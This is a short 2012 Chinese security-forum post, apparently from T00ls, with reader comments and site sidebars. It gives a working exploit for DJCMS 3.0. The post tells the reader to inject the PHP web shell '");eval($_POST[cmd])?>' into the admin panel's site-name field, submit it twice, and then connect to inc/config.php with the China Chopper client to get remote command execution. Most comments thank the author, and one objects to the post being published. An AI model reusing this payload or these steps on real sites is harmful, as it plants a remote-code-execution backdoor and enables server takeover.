DJCMS 3.0后台拿shell

2012-09-13 14:51:11 11 1943 3178

进入后台在其它设置里网站名称插入以下一句话

记住提交两次

");eval($_POST[cmd])?>

然后用菜刀连接

http://www.u.com/inc/config.php

by:xch40

类别 Web安全

关于作者

194323篇文章327篇回复

评论11次

要评论？请先登录或注册

11楼

善良的拖鞋
2012-10-26 11:44

观摩一下

回复|@ta|踩(0)|顶(0)
10楼

p34ch
2012-10-26 10:21

本地测试后，后台程序就乱码了。。继续看看哪里的过滤问题。

回复|@ta|踩(0)|顶(0)
9楼

低调
2012-10-19 11:29

mark！！

回复|@ta|踩(0)|顶(0)
8楼

星天
2012-10-17 15:46

好吧我表示我的两个站都是djcms

回复|@ta|踩(0)|顶(0)
7楼

xiaobai
2012-9-14 21:12

收下了

回复|@ta|踩(0)|顶(0)
6楼

0gussi
2012-9-14 13:20

- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2012-9-13 21:15

收下、、、、、

回复|@ta|踩(0)|顶(0)
4楼

xiehou
2012-9-13 19:54

这算是提交参数的时候没有进行过滤的漏洞吗？

回复|@ta|踩(0)|顶(0)
3楼

ty4z2008
2012-9-13 19:00

和DZ很类似

回复|@ta|踩(0)|顶(0)
2楼

妖妖灵
2012-9-13 18:36

强烈支持原创

回复|@ta|踩(0)|顶(0)
1楼

istice
2012-9-13 17:40

1943 神秘小强本人？

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯从“AI生成色情小说”案看网络传播淫秽物品案件辩护工作开展【T00ls法律讲堂第五十四期】

近日，从网络公开信息获悉，湖北省大冶市人民检察院将国内首例“ ...

2025-08-11 14:26:04 14 1146

安全资讯专访黑客追风人查鲁特：跨域寻道，视角为刃【T00ls人物专访第十四期】

大家好，我叫查鲁特（ID：X-ROOT），查鲁特由ID音译而成，不是我 ...

2025-09-05 15:11:06 11 1225

安全资讯【T00ls十七载同行】我的十年网安梦

作为信安专业科班选手，从最开始做技术，到后来网安头部企业安全 ...

2025-08-22 16:09:25 6 514

安全资讯专访黑客老兵核攻击：从零开始，以码为核【T00ls人物专访第十三期】

核攻击，一个在网络安全江湖中声名远扬的传奇人物，他仿佛是夜空 ...

2025-08-29 16:46:55 11 1477

安全资讯大型语言模型 (LLM) 正陷入网络钓鱼诈骗：当 AI 给你错误的 URL 时会发生什么？😜😜😜😱

图片引用自:netcraftIain-Thomson：犯罪分子已经掌握了一种误导 ...

2025-07-05 04:08:29 6 2044

精华推荐

渗透测试【T00ls十年庆】Spring视图注入

首先恭喜T00LS十周年 :)### 背景在一次对某客户的检测过程中， ...

2018-09-18 22:01:00 17 19430

渗透测试分享一次JS自动化加解密过Sign实战经验

本次实战中使用到了jsrpc+autoDecoder+v_jstools实现了JS无感自 ...

2025-07-28 07:47:08 20 867

渗透测试免杀技术有一套（免杀方法大集结）(Anti-AntiVirus)

之前有个表哥(@lostwolf)说要让分享一下免杀技术，这不我发来了 ...

2017-05-22 08:44:16 105 3888

渗透测试Windows认证原理解析基础入门学习

#### 0x01 前言简介本文借鉴安全界各位大佬所写的Windows认证入 ...

2020-03-17 13:07:21 17 883

渗透测试某金融app的加解密hook+rpc+绕过SSLPinning抓包

## 0x01 抓包### 1.1 burp抓包测试(抓不到)### 1.2 httpcanaryHt ...

2023-03-07 21:57:51 65 21987

Top ↑